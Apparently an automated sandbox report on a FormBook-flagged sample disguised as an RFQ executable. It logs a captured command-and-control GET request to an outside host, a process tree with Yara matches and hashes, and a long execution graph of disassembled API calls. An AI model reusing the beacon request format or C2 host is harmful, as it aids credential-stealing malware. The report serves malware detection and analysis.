                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.750002209.74.77.107801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:19:18.505306005 CET516OUTGET /alu5/?DfkXi=Fj7DJJpHnHupXFB&T0_8iD=m83uTjDkEXAXcvpaGmUoJ8Y4XcRIkh2fMbxp9Jcjydk1OP9q/x+Uq7Puqw1bWxP8wchYD7Gqx/Fq8mp+rVpxoxTX3Hri4zDN+eegDPrTgMxA/Y+TkisFK8oEp+PhGgUu7w71Pleov+1J HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.learnwithus.site
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Nov 20, 2024 10:19:19.101526022 CET548INHTTP/1.1 404 Not Found
                                                          Date: Wed, 20 Nov 2024 09:19:19 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:1
                                                          Start time:04:16:17
                                                          Start date:20/11/2024
                                                          Path:C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe"
                                                          Imagebase:0x7b0000
                                                          File size:1'216'000 bytes
                                                          MD5 hash:9D6670FBEE5FFD65A666A3238DB4F622
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:04:16:19
                                                          Start date:20/11/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe"
                                                          Imagebase:0xbd0000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1518731494.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1524405847.0000000007D70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1519816258.0000000004690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:04:16:34
                                                          Start date:20/11/2024
                                                          Path:C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe"
                                                          Imagebase:0x170000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3132905244.0000000003030000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:11
                                                          Start time:04:16:37
                                                          Start date:20/11/2024
                                                          Path:C:\Windows\SysWOW64\bitsadmin.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\bitsadmin.exe"
                                                          Imagebase:0xaf0000
                                                          File size:186'880 bytes
                                                          MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3130699623.0000000000730000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3133086926.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3132982209.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:12
                                                          Start time:05:17:06
                                                          Start date:20/11/2024
                                                          Path:C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe"
                                                          Imagebase:0x170000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3134906846.00000000049A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:13
                                                          Start time:05:17:18
                                                          Start date:20/11/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff722870000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:4%
                                                            Dynamic/Decrypted Code Coverage:0.5%
                                                            Signature Coverage:6.9%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:161
                                                            execution_graph 93676 7d5dfd 93677 7d5e09 _doexit 93676->93677 93713 7d7eeb GetStartupInfoW 93677->93713 93679 7d5e0e 93715 7d9ca7 GetProcessHeap 93679->93715 93681 7d5e66 93682 7d5e71 93681->93682 93800 7d5f4d 47 API calls 3 library calls 93681->93800 93716 7d7b47 93682->93716 93685 7d5e77 93686 7d5e82 __RTC_Initialize 93685->93686 93801 7d5f4d 47 API calls 3 library calls 93685->93801 93737 7dacb3 93686->93737 93689 7d5e91 93690 7d5e9d GetCommandLineW 93689->93690 93802 7d5f4d 47 API calls 3 library calls 93689->93802 93756 7e2e7d GetEnvironmentStringsW 93690->93756 93693 7d5e9c 93693->93690 93697 7d5ec2 93769 7e2cb4 93697->93769 93700 7d5ec8 93701 7d5ed3 93700->93701 93804 7d115b 47 API calls 3 library calls 93700->93804 93783 7d1195 93701->93783 93704 7d5edb 93705 7d5ee6 __wwincmdln 93704->93705 93805 7d115b 47 API calls 3 library calls 93704->93805 93787 7b3a0f 93705->93787 93708 7d5efa 93709 7d5f09 93708->93709 93806 7d13f1 47 API calls _doexit 93708->93806 93807 7d1186 47 API calls _doexit 93709->93807 93712 7d5f0e _doexit 93714 7d7f01 93713->93714 93714->93679 93715->93681 93808 7d123a 30 API calls 2 library calls 93716->93808 93718 7d7b4c 93809 7d7e23 InitializeCriticalSectionAndSpinCount 93718->93809 93720 7d7b51 93721 7d7b55 93720->93721 93811 7d7e6d TlsAlloc 93720->93811 93810 7d7bbd 50 API calls 2 library calls 93721->93810 93724 7d7b67 93724->93721 93726 7d7b72 93724->93726 93725 7d7b5a 93725->93685 93812 7d6986 93726->93812 93729 7d7bb4 93820 7d7bbd 50 API calls 2 library calls 93729->93820 93732 7d7b93 93732->93729 93734 7d7b99 93732->93734 93733 7d7bb9 93733->93685 93819 7d7a94 47 API calls 4 library calls 93734->93819 93736 7d7ba1 GetCurrentThreadId 93736->93685 93738 7dacbf _doexit 93737->93738 93829 7d7cf4 93738->93829 93740 7dacc6 93741 7d6986 __calloc_crt 47 API calls 93740->93741 93742 7dacd7 93741->93742 93743 7dad42 GetStartupInfoW 93742->93743 93744 7dace2 _doexit @_EH4_CallFilterFunc@8 93742->93744 93750 7dae80 93743->93750 93753 7dad57 93743->93753 93744->93689 93745 7daf44 93836 7daf58 LeaveCriticalSection _doexit 93745->93836 93747 7daec9 GetStdHandle 93747->93750 93748 7d6986 __calloc_crt 47 API calls 93748->93753 93749 7daedb GetFileType 93749->93750 93750->93745 93750->93747 93750->93749 93752 7daf08 InitializeCriticalSectionAndSpinCount 93750->93752 93751 7dada5 93751->93750 93754 7dade5 InitializeCriticalSectionAndSpinCount 93751->93754 93755 7dadd7 GetFileType 93751->93755 93752->93750 93753->93748 93753->93750 93753->93751 93754->93751 93755->93751 93755->93754 93757 7e2e8e 93756->93757 93758 7d5ead 93756->93758 93875 7d69d0 47 API calls _W_store_winword 93757->93875 93763 7e2a7b GetModuleFileNameW 93758->93763 93761 7e2eca FreeEnvironmentStringsW 93761->93758 93762 7e2eb4 ___crtGetEnvironmentStringsW 93762->93761 93764 7e2aaf _wparse_cmdline 93763->93764 93765 7d5eb7 93764->93765 93766 7e2ae9 93764->93766 93765->93697 93803 7d115b 47 API calls 3 library calls 93765->93803 93876 7d69d0 47 API calls _W_store_winword 93766->93876 93768 7e2aef _wparse_cmdline 93768->93765 93770 7e2ccd __wsetenvp 93769->93770 93774 7e2cc5 93769->93774 93771 7d6986 __calloc_crt 47 API calls 93770->93771 93779 7e2cf6 __wsetenvp 93771->93779 93772 7e2d4d 93773 7d1c9d _free 47 API calls 93772->93773 93773->93774 93774->93700 93775 7d6986 __calloc_crt 47 API calls 93775->93779 93776 7e2d72 93777 7d1c9d _free 47 API calls 93776->93777 93777->93774 93779->93772 93779->93774 93779->93775 93779->93776 93780 7e2d89 93779->93780 93877 7e2567 47 API calls 2 library calls 93779->93877 93878 7d6e20 IsProcessorFeaturePresent 93780->93878 93782 7e2d95 93782->93700 93784 7d11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 93783->93784 93786 7d11e0 __IsNonwritableInCurrentImage 93784->93786 93901 7d0f0a 52 API calls __cinit 93784->93901 93786->93704 93788 7b3a29 93787->93788 93789 821ebf 93787->93789 93790 7b3a63 IsThemeActive 93788->93790 93902 7d1405 93790->93902 93794 7b3a8f 93914 7b3adb SystemParametersInfoW SystemParametersInfoW 93794->93914 93796 7b3a9b 93915 7b3d19 93796->93915 93798 7b3aa3 SystemParametersInfoW 93799 7b3ac8 93798->93799 93799->93708 93800->93682 93801->93686 93802->93693 93806->93709 93807->93712 93808->93718 93809->93720 93810->93725 93811->93724 93815 7d698d 93812->93815 93814 7d69ca 93814->93729 93818 7d7ec9 TlsSetValue 93814->93818 93815->93814 93816 7d69ab Sleep 93815->93816 93821 7e30aa 93815->93821 93817 7d69c2 93816->93817 93817->93814 93817->93815 93818->93732 93819->93736 93820->93733 93822 7e30b5 93821->93822 93823 7e30d0 __calloc_impl 93821->93823 93822->93823 93824 7e30c1 93822->93824 93826 7e30e0 RtlAllocateHeap 93823->93826 93827 7e30c6 93823->93827 93828 7d7c0e 47 API calls __getptd_noexit 93824->93828 93826->93823 93826->93827 93827->93815 93828->93827 93830 7d7d18 EnterCriticalSection 93829->93830 93831 7d7d05 93829->93831 93830->93740 93837 7d7d7c 93831->93837 93833 7d7d0b 93833->93830 93861 7d115b 47 API calls 3 library calls 93833->93861 93836->93744 93838 7d7d88 _doexit 93837->93838 93839 7d7da9 93838->93839 93840 7d7d91 93838->93840 93842 7d7e11 _doexit 93839->93842 93855 7d7da7 93839->93855 93862 7d81c2 47 API calls 2 library calls 93840->93862 93842->93833 93843 7d7d96 93863 7d821f 47 API calls 8 library calls 93843->93863 93846 7d7dbd 93848 7d7dc4 93846->93848 93849 7d7dd3 93846->93849 93847 7d7d9d 93864 7d1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93847->93864 93866 7d7c0e 47 API calls __getptd_noexit 93848->93866 93850 7d7cf4 __lock 46 API calls 93849->93850 93854 7d7dda 93850->93854 93853 7d7dc9 93853->93842 93856 7d7dfe 93854->93856 93857 7d7de9 InitializeCriticalSectionAndSpinCount 93854->93857 93855->93839 93865 7d69d0 47 API calls _W_store_winword 93855->93865 93867 7d1c9d 93856->93867 93858 7d7e04 93857->93858 93873 7d7e1a LeaveCriticalSection _doexit 93858->93873 93862->93843 93863->93847 93865->93846 93866->93853 93868 7d1ca6 RtlFreeHeap 93867->93868 93872 7d1ccf __dosmaperr 93867->93872 93869 7d1cbb 93868->93869 93868->93872 93874 7d7c0e 47 API calls __getptd_noexit 93869->93874 93871 7d1cc1 GetLastError 93871->93872 93872->93858 93873->93842 93874->93871 93875->93762 93876->93768 93877->93779 93879 7d6e2b 93878->93879 93884 7d6cb5 93879->93884 93883 7d6e46 93883->93782 93885 7d6ccf _memset __call_reportfault 93884->93885 93886 7d6cef IsDebuggerPresent 93885->93886 93892 7d81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 93886->93892 93889 7d6db3 __call_reportfault 93893 7da70c 93889->93893 93890 7d6dd6 93891 7d8197 GetCurrentProcess TerminateProcess 93890->93891 93891->93883 93892->93889 93894 7da714 93893->93894 93895 7da716 IsProcessorFeaturePresent 93893->93895 93894->93890 93897 7e37b0 93895->93897 93900 7e375f 5 API calls 2 library calls 93897->93900 93899 7e3893 93899->93890 93900->93899 93901->93786 93903 7d7cf4 __lock 47 API calls 93902->93903 93904 7d1410 93903->93904 93967 7d7e58 LeaveCriticalSection 93904->93967 93906 7b3a88 93907 7d146d 93906->93907 93908 7d1477 93907->93908 93909 7d1491 93907->93909 93908->93909 93968 7d7c0e 47 API calls __getptd_noexit 93908->93968 93909->93794 93911 7d1481 93969 7d6e10 8 API calls ___crtsetenv 93911->93969 93913 7d148c 93913->93794 93914->93796 93916 7b3d26 __ftell_nolock 93915->93916 93970 7bd7f7 93916->93970 93920 7b3d57 IsDebuggerPresent 93921 821cc1 MessageBoxA 93920->93921 93922 7b3d65 93920->93922 93923 821cd9 93921->93923 93922->93923 93924 7b3d82 93922->93924 93954 7b3e3a 93922->93954 94172 7cc682 48 API calls 93923->94172 94049 7b40e5 93924->94049 93925 7b3e41 SetCurrentDirectoryW 93928 7b3e4e Mailbox 93925->93928 93928->93798 93929 821ce9 93934 821cff SetCurrentDirectoryW 93929->93934 93931 7b3da0 GetFullPathNameW 94065 7b6a63 93931->94065 93933 7b3ddb 94076 7b6430 93933->94076 93934->93928 93937 7b3df6 93938 7b3e00 93937->93938 94173 7f71fa AllocateAndInitializeSid CheckTokenMembership FreeSid 93937->94173 94092 7b3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 93938->94092 93941 821d1c 93941->93938 93945 821d2d 93941->93945 93944 7b3e0a 93946 7b3e1f 93944->93946 94100 7b4ffc 93944->94100 94174 7b5374 93945->94174 94110 7be8d0 93946->94110 93950 821d35 94181 7bce19 93950->94181 93953 821d42 93955 821d49 93953->93955 93956 821d6e 93953->93956 93954->93925 94187 7b518c 93955->94187 93959 7b518c 48 API calls 93956->93959 93966 821d6a GetForegroundWindow ShellExecuteW 93959->93966 93964 7b518c 48 API calls 93964->93966 93965 821d9e Mailbox 93965->93954 93966->93965 93967->93906 93968->93911 93969->93913 94206 7cf4ea 93970->94206 93972 7bd818 93973 7cf4ea 48 API calls 93972->93973 93974 7b3d31 GetCurrentDirectoryW 93973->93974 93975 7b61ca 93974->93975 94237 7ce99b 93975->94237 93979 7b61eb 93980 7b5374 50 API calls 93979->93980 93981 7b61ff 93980->93981 93982 7bce19 48 API calls 93981->93982 93983 7b620c 93982->93983 94254 7b39db 93983->94254 93985 7b6216 Mailbox 94266 7b6eed 93985->94266 93990 7bce19 48 API calls 93991 7b6244 93990->93991 94273 7bd6e9 93991->94273 93993 7b6254 Mailbox 93994 7bce19 48 API calls 93993->93994 93995 7b627c 93994->93995 93996 7bd6e9 55 API calls 93995->93996 93997 7b628f Mailbox 93996->93997 93998 7bce19 48 API calls 93997->93998 93999 7b62a0 93998->93999 94277 7bd645 93999->94277 94001 7b62b2 Mailbox 94002 7bd7f7 48 API calls 94001->94002 94003 7b62c5 94002->94003 94287 7b63fc 94003->94287 94007 7b62df 94008 7b62e9 94007->94008 94009 821c08 94007->94009 94011 7d0fa7 _W_store_winword 59 API calls 94008->94011 94010 7b63fc 48 API calls 94009->94010 94012 821c1c 94010->94012 94013 7b62f4 94011->94013 94015 7b63fc 48 API calls 94012->94015 94013->94012 94014 7b62fe 94013->94014 94016 7d0fa7 _W_store_winword 59 API calls 94014->94016 94018 821c38 94015->94018 94017 7b6309 94016->94017 94017->94018 94019 7b6313 94017->94019 94020 7b5374 50 API calls 94018->94020 94021 7d0fa7 _W_store_winword 59 API calls 94019->94021 94023 821c5d 94020->94023 94022 7b631e 94021->94022 94024 7b635f 94022->94024 94026 821c86 94022->94026 94029 7b63fc 48 API calls 94022->94029 94025 7b63fc 48 API calls 94023->94025 94024->94026 94027 7b636c 94024->94027 94028 821c69 94025->94028 94030 7b6eed 48 API calls 94026->94030 94303 7cc050 94027->94303 94031 7b6eed 48 API calls 94028->94031 94032 7b6342 94029->94032 94033 821ca8 94030->94033 94035 821c77 94031->94035 94036 7b6eed 48 API calls 94032->94036 94037 7b63fc 48 API calls 94033->94037 94039 7b63fc 48 API calls 94035->94039 94040 7b6350 94036->94040 94041 821cb5 94037->94041 94038 7b6384 94314 7c1b90 94038->94314 94039->94026 94043 7b63fc 48 API calls 94040->94043 94041->94041 94043->94024 94044 7c1b90 48 API calls 94046 7b6394 94044->94046 94046->94044 94047 7b63fc 48 API calls 94046->94047 94048 7b63d6 Mailbox 94046->94048 94330 7b6b68 48 API calls 94046->94330 94047->94046 94048->93920 94050 7b40f2 __ftell_nolock 94049->94050 94051 7b410b 94050->94051 94052 82370e _memset 94050->94052 94839 7b660f 94051->94839 94054 82372a GetOpenFileNameW 94052->94054 94056 823779 94054->94056 94058 7b6a63 48 API calls 94056->94058 94060 82378e 94058->94060 94060->94060 94062 7b4129 94864 7b4139 94062->94864 94066 7b6adf 94065->94066 94068 7b6a6f __wsetenvp 94065->94068 94067 7bb18b 48 API calls 94066->94067 94073 7b6ab6 ___crtGetEnvironmentStringsW 94067->94073 94069 7b6a8b 94068->94069 94070 7b6ad7 94068->94070 95074 7b6b4a 94069->95074 95077 7bc369 48 API calls 94070->95077 94073->93933 94074 7b6a95 94075 7cee75 48 API calls 94074->94075 94075->94073 94077 7b643d __ftell_nolock 94076->94077 95078 7b4c75 94077->95078 94079 7b6442 94080 7b3dee 94079->94080 95089 7b5928 86 API calls 94079->95089 94080->93929 94080->93937 94082 7b644f 94082->94080 95090 7b5798 88 API calls Mailbox 94082->95090 94084 7b6458 94084->94080 94085 7b645c GetFullPathNameW 94084->94085 94086 7b6a63 48 API calls 94085->94086 94087 7b6488 94086->94087 94088 7b6a63 48 API calls 94087->94088 94089 7b6495 94088->94089 94090 825dcf _wcscat 94089->94090 94091 7b6a63 48 API calls 94089->94091 94091->94080 94093 7b3ed8 94092->94093 94094 821cba 94092->94094 95141 7b4024 94093->95141 94098 7b3e05 94099 7b36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94098->94099 94099->93944 94101 7b5027 _memset 94100->94101 95146 7b4c30 94101->95146 94104 7b50ac 94106 7b50ca Shell_NotifyIconW 94104->94106 94107 823d28 Shell_NotifyIconW 94104->94107 95150 7b51af 94106->95150 94109 7b50df 94109->93946 94111 7be8f6 94110->94111 94170 7be906 Mailbox 94110->94170 94112 7bed52 94111->94112 94111->94170 95299 7ce3cd 335 API calls 94112->95299 94113 7fcc5c 86 API calls 94113->94170 94115 7b3e2a 94115->93954 94171 7b3847 Shell_NotifyIconW _memset 94115->94171 94117 7bed63 94117->94115 94119 7bed70 94117->94119 94118 7be94c PeekMessageW 94118->94170 95301 7ce312 335 API calls Mailbox 94119->95301 94121 82526e Sleep 94121->94170 94122 7bed77 LockWindowUpdate DestroyWindow GetMessageW 94122->94115 94123 7beda9 94122->94123 94126 8259ef TranslateMessage DispatchMessageW GetMessageW 94123->94126 94124 7bebc7 94124->94115 95300 7b2ff6 16 API calls 94124->95300 94126->94126 94130 825a1f 94126->94130 94128 7bed21 PeekMessageW 94128->94170 94129 7b1caa 49 API calls 94129->94170 94130->94115 94131 7bebf7 timeGetTime 94131->94170 94133 7cf4ea 48 API calls 94133->94170 94134 7b6eed 48 API calls 94134->94170 94135 7bed3a TranslateMessage DispatchMessageW 94135->94128 94136 825557 WaitForSingleObject 94137 825574 GetExitCodeProcess CloseHandle 94136->94137 94136->94170 94137->94170 94138 7bd7f7 48 API calls 94163 825429 Mailbox 94138->94163 94139 7b2aae 311 API calls 94139->94170 94140 82588f Sleep 94140->94163 94141 7bedae timeGetTime 95302 7b1caa 49 API calls 94141->95302 94144 825733 Sleep 94144->94163 94147 7cdc38 timeGetTime 94147->94163 94148 825926 GetExitCodeProcess 94149 825952 CloseHandle 94148->94149 94150 82593c WaitForSingleObject 94148->94150 94149->94163 94150->94149 94150->94170 94151 825445 Sleep 94151->94170 94152 825432 Sleep 94152->94151 94153 818c4b 108 API calls 94153->94163 94154 7b2c79 107 API calls 94154->94163 94156 8259ae Sleep 94156->94170 94157 7bce19 48 API calls 94157->94163 94161 7bd6e9 55 API calls 94161->94163 94163->94138 94163->94147 94163->94148 94163->94151 94163->94152 94163->94153 94163->94154 94163->94156 94163->94157 94163->94161 94163->94170 95304 7f4cbe 49 API calls Mailbox 94163->95304 95305 7b1caa 49 API calls 94163->95305 95306 7b2aae 335 API calls 94163->95306 95336 80ccb2 50 API calls 94163->95336 95337 7f7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94163->95337 95338 7f6532 63 API calls 3 library calls 94163->95338 94168 7bce19 48 API calls 94168->94170 94169 7bd6e9 55 API calls 94169->94170 94170->94113 94170->94118 94170->94121 94170->94124 94170->94128 94170->94129 94170->94131 94170->94133 94170->94134 94170->94135 94170->94136 94170->94139 94170->94140 94170->94141 94170->94144 94170->94151 94170->94163 94170->94168 94170->94169 95173 7bef00 94170->95173 95180 7bf110 94170->95180 95245 7c45e0 94170->95245 95262 7ce244 94170->95262 95267 7cdc5f 94170->95267 95272 7beed0 335 API calls Mailbox 94170->95272 95273 7c3200 94170->95273 95303 818d23 48 API calls 94170->95303 95307 7bfe30 94170->95307 94171->93954 94172->93929 94173->93941 94175 7df8a0 __ftell_nolock 94174->94175 94176 7b5381 GetModuleFileNameW 94175->94176 94177 7bce19 48 API calls 94176->94177 94178 7b53a7 94177->94178 94179 7b660f 49 API calls 94178->94179 94180 7b53b1 Mailbox 94179->94180 94180->93950 94182 7bce28 __wsetenvp 94181->94182 94183 7cee75 48 API calls 94182->94183 94184 7bce50 ___crtGetEnvironmentStringsW 94183->94184 94185 7cf4ea 48 API calls 94184->94185 94186 7bce66 94185->94186 94186->93953 94188 7b5197 94187->94188 94189 7b519f 94188->94189 94190 821ace 94188->94190 95621 7b5130 94189->95621 94192 7b6b4a 48 API calls 94190->94192 94194 821adb __wsetenvp 94192->94194 94193 7b51aa 94197 7b510d 94193->94197 94195 7cee75 48 API calls 94194->94195 94196 821b07 ___crtGetEnvironmentStringsW 94195->94196 94198 7b511f 94197->94198 94199 821be7 94197->94199 95631 7bb384 94198->95631 95640 7ea58f 48 API calls ___crtGetEnvironmentStringsW 94199->95640 94202 7b512b 94202->93964 94203 821bf1 94204 7b6eed 48 API calls 94203->94204 94205 821bf9 Mailbox 94204->94205 94209 7cf4f2 __calloc_impl 94206->94209 94208 7cf50c 94208->93972 94209->94208 94210 7cf50e std::exception::exception 94209->94210 94215 7d395c 94209->94215 94229 7d6805 RaiseException 94210->94229 94212 7cf538 94230 7d673b 47 API calls _free 94212->94230 94214 7cf54a 94214->93972 94216 7d39d7 __calloc_impl 94215->94216 94223 7d3968 __calloc_impl 94215->94223 94236 7d7c0e 47 API calls __getptd_noexit 94216->94236 94219 7d399b RtlAllocateHeap 94220 7d39cf 94219->94220 94219->94223 94220->94209 94222 7d3973 94222->94223 94231 7d81c2 47 API calls 2 library calls 94222->94231 94232 7d821f 47 API calls 8 library calls 94222->94232 94233 7d1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94222->94233 94223->94219 94223->94222 94224 7d39c3 94223->94224 94227 7d39c1 94223->94227 94234 7d7c0e 47 API calls __getptd_noexit 94224->94234 94235 7d7c0e 47 API calls __getptd_noexit 94227->94235 94229->94212 94230->94214 94231->94222 94232->94222 94234->94227 94235->94220 94236->94220 94238 7bd7f7 48 API calls 94237->94238 94239 7b61db 94238->94239 94240 7b6009 94239->94240 94241 7b6016 __ftell_nolock 94240->94241 94242 7b6a63 48 API calls 94241->94242 94247 7b617c 